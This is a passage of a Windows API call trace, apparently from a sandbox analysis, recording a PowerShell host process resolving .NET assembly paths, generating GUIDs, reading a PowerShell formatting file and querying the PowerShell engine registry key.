	[0092.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0092.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0092.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0092.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0092.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0092.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0092.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0092.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0092.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0092.845] VirtualQuery (in: lpAddress=0x16bf80, lpBuffer=0x16ce40, dwLength=0x30 | out: lpBuffer=0x16ce40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.846] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x9d8265e6, Data2=0xbccd, Data3=0x4816, Data4=([0]=0x97, [1]=0x96, [2]=0x39, [3]=0x44, [4]=0xbe, [5]=0x41, [6]=0x69, [7]=0x6f))) returned 0x0
	[0092.847] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xc6f47be0, Data2=0x1d1f, Data3=0x4f93, Data4=([0]=0x85, [1]=0x83, [2]=0xf6, [3]=0xda, [4]=0x60, [5]=0xc5, [6]=0x8, [7]=0xb6))) returned 0x0
	[0092.848] VirtualQuery (in: lpAddress=0x16c130, lpBuffer=0x16cff0, dwLength=0x30 | out: lpBuffer=0x16cff0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.849] VirtualQuery (in: lpAddress=0x16c130, lpBuffer=0x16cff0, dwLength=0x30 | out: lpBuffer=0x16cff0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.850] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x28938f22, Data2=0x4426, Data3=0x4665, Data4=([0]=0x99, [1]=0x1e, [2]=0xe3, [3]=0x81, [4]=0x7e, [5]=0x27, [6]=0xc0, [7]=0xbd))) returned 0x0
	[0092.854] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x659fa4ef, Data2=0xab9c, Data3=0x4fa9, Data4=([0]=0xbe, [1]=0x78, [2]=0x33, [3]=0x80, [4]=0x89, [5]=0x26, [6]=0x84, [7]=0xb3))) returned 0x0
	[0092.854] VirtualQuery (in: lpAddress=0x16c380, lpBuffer=0x16d240, dwLength=0x30 | out: lpBuffer=0x16d240*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.855] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.855] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.855] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x3c885075, Data2=0xc8d5, Data3=0x4c37, Data4=([0]=0xba, [1]=0x8a, [2]=0x52, [3]=0xd8, [4]=0xaf, [5]=0xca, [6]=0xe7, [7]=0xe4))) returned 0x0
	[0092.856] VirtualQuery (in: lpAddress=0x16c380, lpBuffer=0x16d240, dwLength=0x30 | out: lpBuffer=0x16d240*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.856] VirtualQuery (in: lpAddress=0x16c1a0, lpBuffer=0x16d060, dwLength=0x30 | out: lpBuffer=0x16d060*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.857] VirtualQuery (in: lpAddress=0x16b9f0, lpBuffer=0x16c8b0, dwLength=0x30 | out: lpBuffer=0x16c8b0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.857] VirtualQuery (in: lpAddress=0x16b9f0, lpBuffer=0x16c8b0, dwLength=0x30 | out: lpBuffer=0x16c8b0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.858] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x37e55d, Data2=0xd7d4, Data3=0x4ab1, Data4=([0]=0x8a, [1]=0x6, [2]=0xc3, [3]=0xce, [4]=0x28, [5]=0xe0, [6]=0x6, [7]=0x97))) returned 0x0
	[0092.858] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x315894d6, Data2=0x6f5b, Data3=0x4bf7, Data4=([0]=0x84, [1]=0x37, [2]=0x2d, [3]=0x21, [4]=0x14, [5]=0x1d, [6]=0xa, [7]=0xb7))) returned 0x0
	[0092.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0092.859] SetErrorMode (uMode=0x1) returned 0x1
	[0092.859] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0092.859] GetFileType (hFile=0x334) returned 0x1
	[0092.859] SetErrorMode (uMode=0x1) returned 0x1
	[0092.859] GetFileType (hFile=0x334) returned 0x1
	[0092.859] ReadFile (in: hFile=0x334, lpBuffer=0x3585db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3585db0*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.861] ReadFile (in: hFile=0x334, lpBuffer=0x3585db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3585db0*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.861] ReadFile (in: hFile=0x334, lpBuffer=0x3585db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3585db0*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.861] ReadFile (in: hFile=0x334, lpBuffer=0x3585db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3585db0*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.862] ReadFile (in: hFile=0x334, lpBuffer=0x3585db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3585db0*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.863] ReadFile (in: hFile=0x334, lpBuffer=0x3585db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3585db0*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.900] ReadFile (in: hFile=0x334, lpBuffer=0x3585db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3585db0*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.900] ReadFile (in: hFile=0x334, lpBuffer=0x3585db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3585db0*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.901] ReadFile (in: hFile=0x334, lpBuffer=0x3585db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3585db0*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.901] ReadFile (in: hFile=0x334, lpBuffer=0x3585db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3585db0*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.902] ReadFile (in: hFile=0x334, lpBuffer=0x3585db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3585db0*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.902] ReadFile (in: hFile=0x334, lpBuffer=0x3585db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3585db0*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.902] ReadFile (in: hFile=0x334, lpBuffer=0x3585db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3585db0*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.902] ReadFile (in: hFile=0x334, lpBuffer=0x3585db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3585db0*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.903] ReadFile (in: hFile=0x334, lpBuffer=0x3585db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3585db0*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.903] ReadFile (in: hFile=0x334, lpBuffer=0x3585db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3585db0*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.905] ReadFile (in: hFile=0x334, lpBuffer=0x3585db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3585db0*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.905] ReadFile (in: hFile=0x334, lpBuffer=0x3585db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3585db0*, lpNumberOfBytesRead=0x16d458*=0xbce, lpOverlapped=0x0) returned 1
	[0092.905] ReadFile (in: hFile=0x334, lpBuffer=0x35854e6, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x35854e6*, lpNumberOfBytesRead=0x16d458*=0x0, lpOverlapped=0x0) returned 1
	[0092.905] ReadFile (in: hFile=0x334, lpBuffer=0x3585db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3585db0*, lpNumberOfBytesRead=0x16d458*=0x0, lpOverlapped=0x0) returned 1
	[0092.905] CloseHandle (hObject=0x334) returned 1
	[0092.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0092.906] SetErrorMode (uMode=0x1) returned 0x1
	[0092.906] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d400 | out: lpFileInformation=0x16d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0092.906] SetErrorMode (uMode=0x1) returned 0x1
	[0092.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0092.906] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4e8 | out: phkResult=0x16d4e8*=0x334) returned 0x0
	[0092.906] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d46c, lpData=0x0, lpcbData=0x16d468*=0x0 | out: lpType=0x16d46c*=0x1, lpData=0x0, lpcbData=0x16d468*=0x56) returned 0x0
	[0092.906] CoTaskMemAlloc (cb=0x5a) returned 0x1b863200
	[0092.906] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d43c, lpData=0x1b863200, lpcbData=0x16d438*=0x56 | out: lpType=0x16d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d438*=0x56) returned 0x0
	[0092.906] CoTaskMemFree (pv=0x1b863200) 
	[0092.907] RegCloseKey (hKey=0x334) returned 0x0
	[0092.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0092.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0093.812] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x2ddaa67a, Data2=0x7f48, Data3=0x4e63, Data4=([0]=0xba, [1]=0x6, [2]=0x13, [3]=0x85, [4]=0x5b, [5]=0x91, [6]=0x25, [7]=0xd5))) returned 0x0
	[0093.813] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x40c987b3, Data2=0x73bb, Data3=0x42d4, Data4=([0]=0x95, [1]=0x79, [2]=0x17, [3]=0xcb, [4]=0xc0, [5]=0x69, [6]=0xba, [7]=0x54))) returned 0x0
	[0093.814] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x9e01b684, Data2=0x587a, Data3=0x4674, Data4=([0]=0x93, [1]=0xa, [2]=0xe, [3]=0x6e, [4]=0x5c, [5]=0x90, [6]=0xef, [7]=0xbe))) returned 0x0
	[0093.815] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xd7e400ff, Data2=0xec4c, Data3=0x4cdd, Data4=([0]=0x90, [1]=0x57, [2]=0xf5, [3]=0x0, [4]=0x1e, [5]=0x1e, [6]=0x28, [7]=0xfb))) returned 0x0
	[0093.816] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x708b6c88, Data2=0xdabf, Data3=0x4d27, Data4=([0]=0xa8, [1]=0x6e, [2]=0x9, [3]=0x50, [4]=0x2e, [5]=0x99, [6]=0xc0, [7]=0x7a))) returned 0x0
	[0093.817] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x2dd6cc40, Data2=0x425f, Data3=0x4b78, Data4=([0]=0x98, [1]=0x7b, [2]=0x39, [3]=0x64, [4]=0x4a, [5]=0x71, [6]=0xc2, [7]=0x53))) returned 0x0
	[0093.817] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0093.819] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x9f43953a, Data2=0x9bf7, Data3=0x4bf1, Data4=([0]=0xb5, [1]=0xa5, [2]=0x8e, [3]=0xf5, [4]=0x17, [5]=0x3c, [6]=0xfb, [7]=0x87))) returned 0x0
	[0093.820] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0093.821] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0093.823] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xa7c6deac, Data2=0xa8fc, Data3=0x4ace, Data4=([0]=0xbb, [1]=0x65, [2]=0x6b, [3]=0xcf, [4]=0x46, [5]=0xdc, [6]=0xdb, [7]=0x9))) returned 0x0
	[0093.824] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xaaa232b2, Data2=0x4ac2, Data3=0x4f18, Data4=([0]=0x81, [1]=0xe0, [2]=0x46, [3]=0xcf, [4]=0xee, [5]=0x23, [6]=0x3d, [7]=0x47))) returned 0x0
	[0093.824] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xf810e7ac, Data2=0x907b, Data3=0x45ab, Data4=([0]=0x90, [1]=0xfa, [2]=0x26, [3]=0x8, [4]=0x20, [5]=0x67, [6]=0x2d, [7]=0x7))) returned 0x0
	[0093.825] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xc9795008, Data2=0x8ce6, Data3=0x4b24, Data4=([0]=0x90, [1]=0xa, [2]=0x2f, [3]=0xce, [4]=0x9e, [5]=0x36, [6]=0x13, [7]=0x81))) returned 0x0
	[0093.825] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0093.825] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xb938596, Data2=0x8220, Data3=0x4208, Data4=([0]=0xa1, [1]=0x67, [2]=0xf5, [3]=0x70, [4]=0xe5, [5]=0x29, [6]=0x49, [7]=0xbc))) returned 0x0
	[0093.826] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0093.827] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0093.828] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0093.828] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0093.829] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0093.830] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xc97fb21f, Data2=0x6c20, Data3=0x4662, Data4=([0]=0x83, [1]=0xe5, [2]=0xee, [3]=0xc7, [4]=0x83, [5]=0xee, [6]=0x96, [7]=0x9d))) returned 0x0
	[0093.831] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x50431ce5, Data2=0xd338, Data3=0x486d, Data4=([0]=0x9a, [1]=0xf3, [2]=0xd, [3]=0xbd, [4]=0xc, [5]=0x1e, [6]=0x1d, [7]=0x9d))) returned 0x0
	[0093.831] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xbcb3f733, Data2=0x184d, Data3=0x4f1c, Data4=([0]=0x9f, [1]=0x1, [2]=0xda, [3]=0x8f, [4]=0xc7, [5]=0xc6, [6]=0x20, [7]=0x50))) returned 0x0
	[0093.832] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x331ac9e5, Data2=0x20ff, Data3=0x4385, Data4=([0]=0x96, [1]=0x88, [2]=0xac, [3]=0x26, [4]=0xd2, [5]=0xa2, [6]=0x29, [7]=0x84))) returned 0x0
	[0093.832] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x82441e11, Data2=0xdfa3, Data3=0x4ce9, Data4=([0]=0xa8, [1]=0x9, [2]=0x93, [3]=0x30, [4]=0xef, [5]=0xe1, [6]=0xfb, [7]=0x88))) returned 0x0
	[0093.832] VirtualQuery (in: lpAddress=0x16c380, lpBuffer=0x16d240, dwLength=0x30 | out: lpBuffer=0x16d240*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0093.833] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xc0638e89, Data2=0xc8a1, Data3=0x4093, Data4=([0]=0xa5, [1]=0x70, [2]=0xa9, [3]=0xc4, [4]=0xec, [5]=0xf2, [6]=0xe7, [7]=0xeb))) returned 0x0
	[0093.834] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xbc04783a, Data2=0x531d, Data3=0x4a33, Data4=([0]=0xae, [1]=0xb1, [2]=0x4d, [3]=0xe5, [4]=0xbe, [5]=0x7c, [6]=0xef, [7]=0xdb))) returned 0x0
	[0093.834] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xf1cfd69, Data2=0x42c7, Data3=0x4dc6, Data4=([0]=0x83, [1]=0xba, [2]=0xd9, [3]=0xfa, [4]=0x39, [5]=0xea, [6]=0xb7, [7]=0xf6))) returned 0x0
	[0093.883] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x56f2ce71, Data2=0xad1f, Data3=0x4306, Data4=([0]=0x8f, [1]=0x2e, [2]=0xab, [3]=0xc1, [4]=0x73, [5]=0x89, [6]=0x1e, [7]=0x19))) returned 0x0
	[0093.884] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x6a6ea84, Data2=0x709, Data3=0x4555, Data4=([0]=0x9c, [1]=0x55, [2]=0xe3, [3]=0x1b, [4]=0x4d, [5]=0x79, [6]=0x8, [7]=0x85))) returned 0x0
